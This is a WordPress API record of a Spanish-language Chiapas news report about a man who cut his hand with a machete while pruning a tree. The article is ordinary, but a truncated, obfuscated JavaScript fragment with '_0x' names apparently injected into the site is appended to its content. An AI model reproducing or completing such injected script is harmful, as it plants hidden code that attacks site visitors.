{"id":15702,"date":"2024-05-21T02:06:55","date_gmt":"2024-05-21T02:06:55","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=15702"},"modified":"2024-05-21T02:06:56","modified_gmt":"2024-05-21T02:06:56","slug":"por-podar-un-arbol-un-hombre-se-lesiona-la-mano-con-machete","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=15702","title":{"rendered":"Por podar un \u00e1rbol, un hombre se lesiona la mano con machete"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"15704\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716257094558-1024x576.jpg\" alt=\"\" class=\"wp-image-15704\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716257094558-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716257094558-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716257094558-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716257094558.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"15703\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716257098988-1024x576.jpg\" alt=\"\" class=\"wp-image-15703\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716257098988-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716257098988-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716257098988-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716257098988.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 20 de mayo del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este lunes, un hombre se lesion\u00f3 mientras podaba un \u00e1rbol con un machete en la Colonia Las Palmas de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando un sujeto identificado como Adulfo de 35 a\u00f1os de edad, hab\u00eda sido contratado para podar un \u00e1rbol en la v\u00eda p\u00fablica.<\/p>\n\n\n\n<p>El trabajador se encontraba partiendo las ramas, sin embargo, de manera repentina al dar un golpe el machete rebot\u00f3 y le peg\u00f3 contra la mano izquierda.<\/p>\n\n\n\n<p>Por el impacto del filoso machete se hizo una herida de aproximadamente 7 cent\u00edmetros.<\/p>\n\n\n\n<p>Hasta la Avenida Palma Datilera y Palma China, arribaron param\u00e9dicos de la Cruz Roja Mexicana, para atender al lesionado y trasladarlo al hospital Gilberto G\u00f3mez Maza para su atenci\u00f3n m\u00e9dica especializada.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 20 de mayo del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este lunes, un hombre se lesion\u00f3 mientras podaba un \u00e1rbol con un machete en la Colonia Las Palmas de Tuxtla Guti\u00e9rrez. Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando un sujeto identificado como Adulfo de 35 a\u00f1os de edad, hab\u00eda sido contratado &hellip;<\/p>\n","protected":false},"author":2,"featured_media":15703,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-15702","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15702","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15702"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15702\/revisions"}],"predecessor-version":[{"id":15705,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15702\/revisions\/15705"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/15703"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15702"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15702"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15702"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}